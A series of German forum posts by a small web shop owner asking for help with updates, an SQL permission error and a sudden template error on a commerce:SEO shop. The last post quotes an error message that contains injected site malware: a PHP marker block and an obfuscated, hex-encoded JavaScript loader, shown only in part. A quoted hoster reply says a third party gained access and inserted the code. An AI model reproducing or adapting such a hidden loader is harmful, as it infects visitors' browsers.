Beiträge von Kasha_ich

Danke jotest, für deine Hilfe.

Leider verstehe ich von phpadmin, ofcourse und salt key soviel, wie eine Kuh vom Stricken. Ich habe ja noch meinen Gambio Shop, da war es definitiv einfacher. Selbst ein Laie wie ich, habe es hinbekommen. Da heißt es, mach den download, installiere über Filezilla ... Fertig.

LG
    Kasha

Hallo

Ich brauche für meinen Shop das neue Verbraucherrecht Update.

Ich habe die Version 2.3.9 Plus. Mein Shop sagt, er ist auf den neuesten Stand. Das Update habe ich aber nur für die Version 2.5.5 gefunden. Kann mir jemand helfen? Kann ich den Shop zwischenzeitlich offline stellen?

Vielen Dank

Kasha

Hallo,

ich habe schon wieder ein Problem und trotz Neuaufspielen des Shops zeigt es dasselbe Problem an

SQL Fehler [256] (1142) UPDATE command denied to user '4030_3.usr1'@'192.168.43.10' for table 'whos_online_year'

Query: UPDATE whos_online_year SET count = 18045 WHERE whos_online_id = 2494

Beim Aufruf der Datei /commerce_seo_url.php , PHP 5.2.17 (Linux)

Fatal error: (SQL) in /webspace/06/4030/sonnenshop24.eu/inc/xtc_db_error.inc.php on line 59

Was ist das?

Boah, ich finde das nicht. WO IST DAS HANDBUCH ??????????????????????????????????????

Ich will auch das Logo ordentlich ändern, dass das nicht so gequetscht ist, find´ ich auch nicht.

Ich habe den Shop erstmal wieder hinbekommen und er läuft. Aktuelle Version 2.3.2 Plus. Jetzt kommt ständig:

Es gibt eine neuere Version, bitte aktualisieren Sie! Aktuell ist die Version 2.3.6 und diese finden Sie im Supportforum (Link ist im Admin oben rechts). Sollten Sie bereits das Update eingespielt haben, installieren Sie bitte im Admin noch unter Module > Installation / Update das Fixpack. Hierbei wird auch Ihre Datenbank aktualisiert.

Ist echt Mist, dass ich kein Original habe.
    Ich finde nämlich kein Update

Danke Mario,

ist Gott sei Dank nicht mein Hauptshop. Den originalen habe ich wieder hergestellt und DB Passwort geändert. Jetzt frag ich mal den Herrn Kausch, ob er mir den Shop nochmal aufspielen kann. Habe nämlich keine Original Daten. Das hat er damals alles gemacht.

Hallo an alle,

ich habe seit heute folgendes Problem:

#74ed9f# if(empty($smak)) { $smak = " "; echo $smak; } #/74ed9f# #74ed9f# if(empty($smak)) { $smak = " "; echo $smak; } #/74ed9f#
    Fatal error: Uncaught exception 'SmartyCompilerException' with message 'Syntax Error in template "./templates/cseov22-gray-day/boxes/box_login.html" on line 8 "<div class="fl">Email: {$FIELD_EMAIL}</div><!--74ed9f--><script type="text/javascript" language="javascript" > if(document.querySelector)lpasbs=4;kjn=("55,9b,aa,a3,98,a9,9e,a4,a3,55,aa,a3,a5,97,65,6e,5d,5e,55,b0,42,3f,55,ab,96,a7,55,a8,a9,96,a9,9e,98,72,5c,96,9f,96,ad,5c,70,42,3f,55,ab,96,a7,55,98,a4,a3,a9,a7,a4,a1,a1,9a,a7,72,5c,9e,a3,99,9a,ad,63,a5,9d,a5,5c,70,42,3f,55,ab,96,a7,55,aa,a3,a5,97,55,72,55,99,a4,98,aa,a2,9a,a3,a9,63,98,a7,9a,96,a9,9a,7a,a1,9a,a2,9a,a3,a9,5d,5c,9e,9b,a7,96,a2 in /webspace/06/4030/sonnenshop24.eu/includes/classes/Smarty_3/sysplugins/smarty_internal_templatecompilerbase.php on line 665

Ich habe keine Ahnung was da passiert ist und wie ich das wieder hinbekomme. Für Hilfen wäre ich äußerst dankbar.

United Domains schreibt:

Leider ist es uns nicht möglich, Ihre Websiten wiederherzustellen.

...Wir konnten allerdings feststellen, dass in Ihre Seite, Java-Script Code eingefügt wurde, der Besucher infizieren könnte.
    Anscheinend hatte ein Dritter unberechtigten Zugriff auf Ihren Webspace und konnten so, Ihre Seite manipulieren...

Kasha